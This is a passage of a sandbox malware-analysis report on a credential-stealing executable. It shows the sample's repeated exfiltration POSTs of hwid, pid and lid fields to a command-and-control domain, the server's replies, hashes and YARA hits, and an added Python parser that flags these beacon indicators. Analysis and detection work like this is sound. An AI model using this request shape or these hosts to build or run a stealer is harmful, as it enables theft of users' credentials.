                                                                          Data Ascii: 26e41RDmX73JPdTRrTVWWbFV943IwXgnb+RqiI0ojJT0TL2sLfpKr80l0ZbTRRVA/ALFzL6/aWQu/ySS/AuCivlOrINe11u2xSDW1t1LUw/kCrLM8u4Wcj61P5/vadHW6Aej0gW0FemEa8XWy0sSQbFb/4L17UQsbfFnjYIAoIn8RbedGMpzmscg25ucAGtxqVnygvHpR2ogp2uK5AfBzLd29NILtBX7/yjZmJQdRAKdV/eA+/BdaiCnYorkb
                                                                          2024-10-28 17:43:09 UTC1369INData Raw: 33 6e 34 55 51 35 45 75 34 39 42 58 38 6d 70 55 4d 54 30 69 36 66 4e 7a 4d 75 4c 39 5a 61 6a 62 65 4a 49 4c 38 41 63 2f 45 37 77 6e 69 30 69 62 33 51 37 58 4e 50 63 62 62 74 68 78 57 58 37 70 5a 76 4d 4b 32 2b 52 5a 79 50 71 6b 6b 7a 71 31 2b 32 64 53 6c 45 75 2f 42 52 4b 51 66 70 49 51 79 6c 34 44 54 55 77 63 42 2f 45 69 38 31 4c 61 34 56 54 68 38 34 57 66 63 76 33 6d 2f 75 74 46 4b 71 35 67 79 2b 56 32 38 39 42 58 43 6c 5a 30 46 55 6c 6d 74 47 72 4c 4d 2b 62 38 4f 45 79 36 76 4b 4d 79 2f 4b 4d 47 37 75 51 6d 69 30 6b 75 30 65 4c 6a 45 4a 64 43 41 67 6b 5a 7a 54 4b 31 51 33 59 48 6d 2b 42 5a 6b 4c 75 45 6b 6b 75 39 77 77 59 44 6d 43 65 4c 43 51 61 38 59 36 4a 31 37 68 59 6e 64 45 68 56 5a 2f 41 4b 75 77 72 62 74 46 6e 49 75 6f 47 66 59 72 6a 69 43 6b 76
                                                                          Data Ascii: 3n4UQ5Eu49BX8mpUMT0i6fNzMuL9ZajbeJIL8Ac/E7wni0ib3Q7XNPcbbthxWX7pZvMK2+RZyPqkkzq1+2dSlEu/BRKQfpIQyl4DTUwcB/Ei81La4VTh84Wfcv3m/utFKq5gy+V289BXClZ0FUlmtGrLM+b8OEy6vKMy/KMG7uQmi0ku0eLjEJdCAgkZzTK1Q3YHm+BZkLuEkku9wwYDmCeLCQa8Y6J17hYndEhVZ/AKuwrbtFnIuoGfYrjiCkv


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          2 | 192.168.2.6 | 49712 | 188.114.96.3 | 443 | 5936 | C:\Users\user\Desktop\file.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-10-28 17:43:10 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 12864
                                                                          Host: necklacedmny.store
                                                                          2024-10-28 17:43:10 UTC12864OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 45 38 45 41 45 45 30 31 39 41 31 37 35 35 42 31 30 45 30 42 46 43 42 30 35 45 36 34 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"15E8EAEE019A1755B10E0BFCB05E64FF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          3 | 192.168.2.6 | 49972 | 188.114.96.3 | 443 | 5936 | C:\Users\user\Desktop\file.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-10-28 17:44:07 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 15110
                                                                          Host: necklacedmny.store
                                                                          2024-10-28 17:44:07 UTC15110OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 45 38 45 41 45 45 30 31 39 41 31 37 35 35 42 31 30 45 30 42 46 43 42 30 35 45 36 34 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"15E8EAEE019A1755B10E0BFCB05E64FF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          4 | 192.168.2.6 | 49987 | 188.114.96.3 | 443 | 5936 | C:\Users\user\Desktop\file.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-10-28 17:44:10 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 19968
                                                                          Host: necklacedmny.store
                                                                          2024-10-28 17:44:10 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 45 38 45 41 45 45 30 31 39 41 31 37 35 35 42 31 30 45 30 42 46 43 42 30 35 45 36 34 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"15E8EAEE019A1755B10E0BFCB05E64FF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                          2024-10-28 17:44:10 UTC4637OUTData Raw: f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70
                                                                          Data Ascii: +?2+?2+?o?Mp5p
                                                                          2024-10-28 17:44:22 UTC | 1022 | IN | HTTP/1.1 200 OK
                                                                          Date: Mon, 28 Oct 2024 17:44:21 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=aqnk5ee6tkmkapojsncdmc368p; expires=Fri, 21 Feb 2025 11:30:50 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9txFWL0RIz%2Flg21Emh3TeI%2BrnObwFsOhIBhloPaSsbvj7sQvsK8A6gFTDf8pMdntT8LZ14yWt4g2G7NYVfxAsJ4ut8%2BBJXjo3I6dQlZGvxYLuSXpturbP4T%2BV%2B2AZxOcm7MYUMI%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8d9cbb7c2a4444eb-ATL
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=17805&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2844&recv_bytes=20932&delivery_rate=162778&cwnd=32&unsent_bytes=0&cid=5b33c60aa85c8aa0&ts=11199&x=0"
                                                                          2024-10-28 17:44:22 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a
                                                                          Data Ascii: 11ok 155.94.241.188
                                                                          2024-10-28 17:44:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          5 | 192.168.2.6 | 49989 | 188.114.96.3 | 443 | 5936 | C:\Users\user\Desktop\file.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-10-28 17:44:23 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 1199
                                                                          Host: necklacedmny.store
                                                                          2024-10-28 17:44:23 UTC1199OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 45 38 45 41 45 45 30 31 39 41 31 37 35 35 42 31 30 45 30 42 46 43 42 30 35 45 36 34 46 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"15E8EAEE019A1755B10E0BFCB05E64FF--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                          2024-10-28 17:44:58 UTC | 1014 | IN | HTTP/1.1 200 OK
                                                                          Date: Mon, 28 Oct 2024 17:44:58 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=svpjko1p08b8bq2625pbntgfn2; expires=Fri, 21 Feb 2025 11:31:02 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gauv3GfnfLMi%2F5rvR06jpYCO0N4%2BwW3MdwYhffRfjs8idDbSTIm0ElFBqo7APaCSVvBAzOtKnqG1S7Vsa5dIZfrpwiVeaZA4tH3IPqbSqxQYXIqAUEDPzeUzy6LlyQacoU007pI%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8d9cbbc8ea022fd8-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1320&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2118&delivery_rate=2166043&cwnd=250&unsent_bytes=0&cid=5b05e812dfd53b51&ts=35197&x=0"
                                                                          2024-10-28 17:44:58 UTC | 23 | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a
                                                                          Data Ascii: 11ok 155.94.241.188
                                                                          2024-10-28 17:44:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0

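The four sessions above repeat one request shape: a POST to /api on necklacedmny.store, multipart/form-data with the fixed boundary be85de5ipdocierre1 and a Chrome/119 User-Agent, carrying a 32-hex-digit hwid, a small integer pid and a lid field, answered with a chunked body of the form "ok <ip>". The following is an added example, not code from Joe Sandbox or from the sample: a dependency-free Python parser that splits the raw request, walks the multipart body, decodes the chunked reply and reports which of those indicators a request matches. The request bytes are constructed from the captured fields; the captured body continues past lid (the real one is 12864 bytes) and is cut off in the report after "4SD0y4--legen", so that visible prefix stands in for the lid value and the body is closed right after it for illustration.

```python
import re

BOUNDARY_RE = re.compile(r"multipart/form-data;\s*boundary=([^\s;]+)", re.I)
NAME_RE = re.compile(rb'name="([^"]+)"')


def split_http_message(raw: bytes):
    """Split a raw HTTP/1.1 message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("ascii", "replace").lower()] = value.strip().decode("ascii", "replace")
    return lines[0].decode("ascii", "replace"), headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: raw value bytes} for a multipart/form-data body."""
    delimiter = b"--" + boundary.encode("ascii")
    fields = {}
    for part in body.split(delimiter)[1:]:        # element 0 is the preamble
        if part.startswith(b"--"):                # closing delimiter "--boundary--"
            break
        header_block, _, value = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        match = NAME_RE.search(header_block)
        if match:
            # The CRLF before the next delimiter is framing, not part of the value.
            fields[match.group(1).decode("ascii")] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def dechunk(body: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body: hex size, CRLF, data, CRLF, ..., zero-size chunk."""
    out, pos = b"", 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)   # chunk extensions are ignored
        if size == 0:
            return out
        out += body[end + 2:end + 2 + size]
        pos = end + 2 + size + 2                       # skip the data and its trailing CRLF


def lumma_beacon_indicators(raw_request: bytes) -> list:
    """Return the indicators from the captured sessions that this request matches."""
    start_line, headers, body = split_http_message(raw_request)
    hits = []
    method, _, rest = start_line.partition(" ")
    if method == "POST" and rest.split(" ")[0] == "/api":
        hits.append("POST /api")
    match = BOUNDARY_RE.search(headers.get("content-type", ""))
    if not match:
        return hits
    fields = parse_multipart(body, match.group(1))
    if {"hwid", "pid", "lid"} <= set(fields):
        hits.append("hwid/pid/lid form fields")
    if re.fullmatch(rb"[0-9A-F]{32}", fields.get("hwid", b"")):
        hits.append("32-hex-digit hwid")
    return hits


# Constructed sample: session 2 of the capture, with the body closed after the
# lid field, which is cut off in the report (the real body is 12864 bytes).
BOUNDARY = "be85de5ipdocierre1"


def form_part(name: str, value: str) -> bytes:
    return f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode()


SAMPLE_BODY = (form_part("hwid", "15E8EAEE019A1755B10E0BFCB05E64FF")
               + form_part("pid", "2")
               + form_part("lid", "4SD0y4--legen")      # truncated here in the capture
               + f"--{BOUNDARY}--\r\n".encode())
SAMPLE_REQUEST = (
    b"POST /api HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY.encode() + b"\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    + f"Content-Length: {len(SAMPLE_BODY)}\r\n".encode()
    + b"Host: necklacedmny.store\r\n\r\n"
    + SAMPLE_BODY
)
# The chunked reply body exactly as captured in sessions 4 and 5.
SAMPLE_RESPONSE_BODY = bytes.fromhex(
    "31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 0d 0a "
    "30 0d 0a 0d 0a"
)

if __name__ == "__main__":
    print(lumma_beacon_indicators(SAMPLE_REQUEST))   # ['POST /api', 'hwid/pid/lid form fields', '32-hex-digit hwid']
    print(dechunk(SAMPLE_RESPONSE_BODY))              # b'ok 155.94.241.188'
```

Match on the body rather than the reply headers: the server labels the reply text/html and sets a PHPSESSID cookie like an ordinary web application, and only the decoded chunk "ok 155.94.241.188" distinguishes it. A POST to /api alone is not evidence of anything; the combination with the hwid/pid/lid form fields is what ties a request to these sessions.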


                                                                          Target ID:0
                                                                          Start time:13:43:04
                                                                          Start date:28/10/2024
                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x3d0000
                                                                          File size:2'972'160 bytes
                                                                          MD5 hash:E9D35001E68E949A301D6D0073BE4661
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2909718678.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.3278797588.0000000005584000.00000004.00000800.00020000.00000000.sdmp, Offset: 05581000, based on PE: false
                                                                            • Associated: 00000000.00000003.3048973577.0000000005581000.00000004.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_5581000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: g$qZ
                                                                            • API String ID: 0-288989974
                                                                            • Opcode ID: 626a1078145dbd6548758d8ee615f5f0a23088056b8302589b622d72bc1bc8e5
                                                                            • Instruction ID: 14a9d60916188d545319ce92a2437b5cbf5baa53d632e587d0f302baf7783478
                                                                            • Opcode Fuzzy Hash: 626a1078145dbd6548758d8ee615f5f0a23088056b8302589b622d72bc1bc8e5
                                                                            • Instruction Fuzzy Hash: 6C42426240E3C00FD3139BB89C666A57FB0AF13221B1E46DBC0D4EF5E3E259594AC762
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.3049021102.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, Offset: 00E58000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_e58000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cc32f643072fc828c887649f2b890c449bde294a836ceaaf03f67a414b65da4c
                                                                            • Instruction ID: 6a8940c5955fe289d9caa18d3b1f4bb57af20e7ef437cf8330d7aaf34ee41558
                                                                            • Opcode Fuzzy Hash: cc32f643072fc828c887649f2b890c449bde294a836ceaaf03f67a414b65da4c
                                                                            • Instruction Fuzzy Hash: 4721FF7205A3C1AFCB52DF38C9D1A833F61AF4732474A82D8E4805E047D328A623CB92